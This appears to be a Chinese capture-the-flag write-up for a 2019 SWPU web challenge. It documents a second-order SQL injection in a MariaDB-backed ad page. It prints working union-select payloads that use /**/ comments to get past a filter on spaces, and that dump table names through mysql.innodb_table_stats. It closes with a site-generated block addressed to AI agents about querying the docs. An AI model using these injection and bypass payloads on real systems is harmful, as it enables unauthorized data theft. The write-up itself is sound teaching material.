# Web1
注册、登录、广告页面可能存在SQL注入。在广告页面使用
查看广告详情产生报错,由此推断此为SQL注入点。另外通过报错,可以知道这是MairaDB数据库。
初步判断是二次注入,且注入点在广告名(即ID中)。
尝试万能密码,发现存在waf。
尝试fuzz了一下,但是因为广告发布次数存在上限,所以fuzz效果不佳。
但是大概还是知道or被过滤了,所以order by 语句,information\_schema不能使用了。
发现空格被正则,使用/\*\*/绕过,剩下的就比较简单,爆列(22列,就尼玛离谱)其中2、3列回显。
```
-1'union/**/select/**/1,user(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
```
爆库名:
```
-1'union/**/select/**/1,database(),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
```
来自官方对mysql.innodb\_tables\_stats的解释:
参考博客:
> 在mysql5.6以上的版本中,会在系统库MYSQL库中存在两张与innodb相关的表innodb\_index\_stats和innodb\_table\_stats。 其中innodb\_index\_stats存储的是innodb引擎的库名,表名及其对应的索引名称,也就是和information\_schema.schemata差不多。 innodb\_table\_stats存储的是innodb引擎的库名和表名,也就是和information\_schema.tables差不多。
```
-1'union/**/select/**/1,(select/**/group_concat(table_name)/**/from/**/mysql.innodb_table_stats),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
```
可惜用这种方法只能爆表名,不能爆列。
```
1'/**/union/**/select/**/1,(select/**/group_concat(b)/**/from(select/**/1,2,3/**/as/**/b/**/union/**/select*from/**/users)x),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,'22
```
子查询拿flag。
---
# Agent Instructions: Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter:
```
GET https://gitbook-88.gitbook.io/ctf-writeup/2019/2019-swpu/web1.md?ask=
```
The question should be specific, self-contained, and written in natural language.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.